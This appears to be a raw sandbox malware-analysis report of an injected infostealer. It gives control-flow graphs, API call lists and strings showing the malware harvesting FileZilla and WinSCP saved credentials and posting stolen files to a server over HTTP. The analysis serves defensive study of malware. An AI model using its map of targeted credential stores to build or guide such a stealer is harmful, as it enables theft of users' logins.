                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 29 2a053aa-2a054bb call 2a12143 call 2a12175 call 2a049de call 2a13ab9 lstrlen call 2a13ab9 call 2a12143 * 4 StrCmpCA 48 2a054c3-2a054c9 29->48 49 2a054bd 29->49 50 2a054e6-2a055f6 call 2a138a6 call 2a12223 call 2a121e9 call 2a02910 * 2 call 2a12265 call 2a12223 call 2a12265 call 2a121e9 call 2a02910 * 3 call 2a12265 call 2a12223 call 2a121e9 call 2a02910 * 2 InternetConnectA 48->50 51 2a054cb-2a054e0 InternetOpenA 48->51 49->48 52 2a05d8c-2a05e14 call 2a02910 * 4 call 2a12175 call 2a02910 * 3 50->52 118 2a055fc-2a0563a HttpOpenRequestA 50->118 51->50 51->52 86 2a05e16-2a05e56 call 2a02910 * 6 call 2a1e88c 52->86 119 2a05d80-2a05d86 InternetCloseHandle 118->119 120 2a05640-2a05646 118->120 119->52 121 2a05664-2a05c9f call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 lstrlen * 2 GetProcessHeap RtlAllocateHeap lstrlen call 2a288d0 lstrlen call 2a288d0 lstrlen * 2 call 2a288d0 lstrlen HttpSendRequestA HttpQueryInfoA 120->121 122 2a05648-2a0565e InternetSetOptionA 120->122 309 2a05ca1-2a05cd8 call 2a12143 call 2a02910 * 3 121->309 310 2a05cdd-2a05ced call 2a13759 121->310 122->121 309->86 315 2a05cf3-2a05cf8 310->315 316 2a05e57 310->316 318 2a05d39-2a05d56 InternetReadFile 315->318 320 2a05d58-2a05d6b StrCmpCA 318->320 321 2a05cfa-2a05d02 318->321 324 2a05d74-2a05d7a InternetCloseHandle 320->324 325 2a05d6d-2a05d6e ExitProcess 320->325 321->320 323 2a05d04-2a05d34 call 2a12265 call 2a121e9 call 2a02910 321->323 323->318 324->119
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A16
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A1C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04A2E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04A36
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A05441
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13AB9: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,00000000,0000000F,0000000F,?,02A0543A,?,?,?,?), ref: 02A13AD9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13AB9: GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 02A13AE6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13AB9: RtlAllocateHeap.NTDLL(00000000), ref: 02A13AED
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A37A3B,02A37A3A,02A37A37,02A37A2F), ref: 02A054B0
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A054D2
                                                                                                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A055E8
                                                                                                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A0562C
                                                                                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A0565E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,",file_data,02A38A18,------,02A38A0C,?,",02A38A00,------,02A389F4,27536a38d3707b6600f28b9d7177a12c,",build_id,02A389DC,------), ref: 02A05B8F
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A05BA2
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A05BBA
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A05BC1
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A05BCE
                                                                                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 02A05BDC
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,?,?), ref: 02A05BF1
                                                                                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 02A05BFE
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A05C0C
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 02A05C1A
                                                                                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 02A05C2D
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 02A05C42
                                                                                                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(?,?,00000000), ref: 02A05C55
                                                                                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 02A05C97
                                                                                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000007CF,?), ref: 02A05D4E
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,block), ref: 02A05D63
                                                                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02A05D6E
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocateOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                                                                                                                                                                                                          • String ID: ------$"$"$"$"$--$------$------$------$------$27536a38d3707b6600f28b9d7177a12c$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4232923880-1561498756
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d2739435df58083282d6ea042fa6102391e9b65c0f16ca228520677fdf866d9d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8e4bc849087b1d00cef17cf750fb0e9e36612a7fc8ccd8c7ca2aa5e50ea8d51b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2739435df58083282d6ea042fa6102391e9b65c0f16ca228520677fdf866d9d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C42D772D8016D9ADF21EB21ED85BDDB3BABF00350F0585E1A94873161CE71AF969F80
                                                                                                                                                                                                                                                                                                                                                          Function 02A0F6CB Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 292stringmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A13A59
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A09163
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0F752,?,?,?), ref: 02A0917A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0F752,?,?,?), ref: 02A09191
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A091A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CloseHandle.KERNEL32(?,?,?,?,?,02A0F752,?,?,?), ref: 02A091D0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A18680,?), ref: 02A13A93
                                                                                                                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 02A0F77A
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,000F423F,02A379E7,02A379D7,02A379D6,02A379D3), ref: 02A0F7C0
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A0F7C7
                                                                                                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 02A0F7DB
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02A0F7E6
                                                                                                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 02A0F81A
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02A0F825
                                                                                                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<User>), ref: 02A0F853
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02A0F85E
                                                                                                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 02A0F88C
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02A0F897
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A0F902
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A0F916
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(02A0FCF9), ref: 02A0FA3E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$File$AllocCreateHeapLocallstrcat$AllocateCloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                                                                                                                                                                                                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1004949264-935134978
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 470ec215bc60778ac55de552249fa543520a8ad409cc7a41d98eb187dec82d77
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: bc3d0cf2a4c70ea2f6fd680068a8e481892870d79453a4656e9ef16e226fdb4e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 470ec215bc60778ac55de552249fa543520a8ad409cc7a41d98eb187dec82d77
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30A11172D80219AFDF05EBA1ED8AA9E7BB5BF04750B100521FE01B3060DF75AA558F91
                                                                                                                                                                                                                                                                                                                                                          Function 02A0F182 Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325registryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 1465 2a0f182-2a0f22d call 2a25490 * 4 RegOpenKeyExA 1474 2a0f233-2a0f25e RegGetValueA 1465->1474 1475 2a0f6b4-2a0f6ca call 2a01cce call 2a1e88c 1465->1475 1476 2a0f260-2a0f266 1474->1476 1477 2a0f283-2a0f289 1474->1477 1476->1475 1480 2a0f26c-2a0f27e RegCloseKey 1476->1480 1477->1476 1481 2a0f28b-2a0f291 1477->1481 1480->1475 1483 2a0f293-2a0f29f RegCloseKey 1481->1483 1484 2a0f2a5-2a0f2bd RegOpenKeyExA 1481->1484 1483->1484 1484->1475 1486 2a0f2c3-2a0f2e4 RegEnumKeyExA 1484->1486 1486->1476 1487 2a0f2ea-2a0f2f5 call 2a12143 1486->1487 1489 2a0f2fa-2a0f3d9 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 RegGetValueA call 2a12265 call 2a121e9 call 2a02910 RegGetValueA 1487->1489 1508 2a0f429-2a0f450 call 2a12265 call 2a121e9 call 2a02910 1489->1508 1509 2a0f3db-2a0f427 call 2a1424c call 2a12223 call 2a121e9 call 2a02910 * 2 1489->1509 1520 2a0f455-2a0f565 call 2a12265 call 2a121e9 call 2a02910 RegGetValueA call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 RegGetValueA call 2a12265 call 2a121e9 call 2a02910 StrCmpCA 1508->1520 1509->1520 1550 2a0f567-2a0f58c call 2a0ec8f 1520->1550 1551 2a0f5cd-2a0f632 call 2a12265 call 2a121e9 call 2a02910 RegEnumKeyExA 1520->1551 1556 2a0f590-2a0f5c7 call 2a12265 call 2a121e9 call 2a02910 call 2a1045e 1550->1556 1557 2a0f58e 1550->1557 1551->1489 1565 2a0f638-2a0f694 call 2a01ced lstrlen call 2a12143 call 2a18be6 call 2a02910 1551->1565 1556->1551 1557->1556 1579 2a0f696-2a0f6a2 RegCloseKey 1565->1579 1580 2a0f6a9-2a0f6af call 2a02910 1565->1580 1579->1580 1580->1475
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A0F1B3
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A0F1D3
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A0F1E4
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A0F1F5
                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0F229
                                                                                                                                                                                                                                                                                                                                                          • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 02A0F25A
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0F272
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0F299
                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0F2B9
                                                                                                                                                                                                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 02A0F2DC
                                                                                                                                                                                                                                                                                                                                                          • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,02A379CA), ref: 02A0F375
                                                                                                                                                                                                                                                                                                                                                          • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 02A0F3D5
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                                                                                                                                                                                                          • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 463713726-2798830873
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 64f06e15fa073811b52b06fa3cbdf1dc246eb500ac5cd2a40e045aef26643c21
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 955a13a0728226007a17b1f1f16846062dc0800644a9a0feecb3550f15ebb347
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64f06e15fa073811b52b06fa3cbdf1dc246eb500ac5cd2a40e045aef26643c21
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2D1A97295012DAEEB21EBA0ED81BD9B779AF04344F4044E7AA09B7050DE717F85CF61
                                                                                                                                                                                                                                                                                                                                                          Function 02A05E61 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 469networkstringmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 1582 2a05e61-2a05f26 call 2a12175 call 2a049de call 2a12143 * 5 InternetOpenA StrCmpCA 1597 2a05f28 1582->1597 1598 2a05f2e-2a05f34 1582->1598 1597->1598 1599 2a05f3a-2a060c4 call 2a138a6 call 2a12223 call 2a121e9 call 2a02910 * 2 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a12223 call 2a121e9 call 2a02910 * 2 InternetConnectA 1598->1599 1600 2a0663e-2a06663 InternetCloseHandle call 2a091ff 1598->1600 1676 2a06638 1599->1676 1677 2a060ca-2a06108 HttpOpenRequestA 1599->1677 1606 2a06665-2a06691 call 2a121a5 call 2a12265 call 2a121e9 call 2a02910 1600->1606 1607 2a06696-2a06718 call 2a02910 * 4 call 2a01cce call 2a02910 call 2a1e88c 1600->1607 1606->1607 1676->1600 1678 2a0662c-2a06632 InternetCloseHandle 1677->1678 1679 2a0610e-2a06114 1677->1679 1678->1676 1680 2a06132-2a065c0 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 call 2a12223 call 2a121e9 call 2a02910 lstrlen * 2 GetProcessHeap RtlAllocateHeap lstrlen call 2a288d0 lstrlen * 2 call 2a288d0 lstrlen HttpSendRequestA 1679->1680 1681 2a06116-2a0612c InternetSetOptionA 1679->1681 1824 2a06601-2a0661e InternetReadFile 1680->1824 1681->1680 1825 2a06620-2a06626 InternetCloseHandle 1824->1825 1826 2a065c2-2a065ca 1824->1826 1825->1678 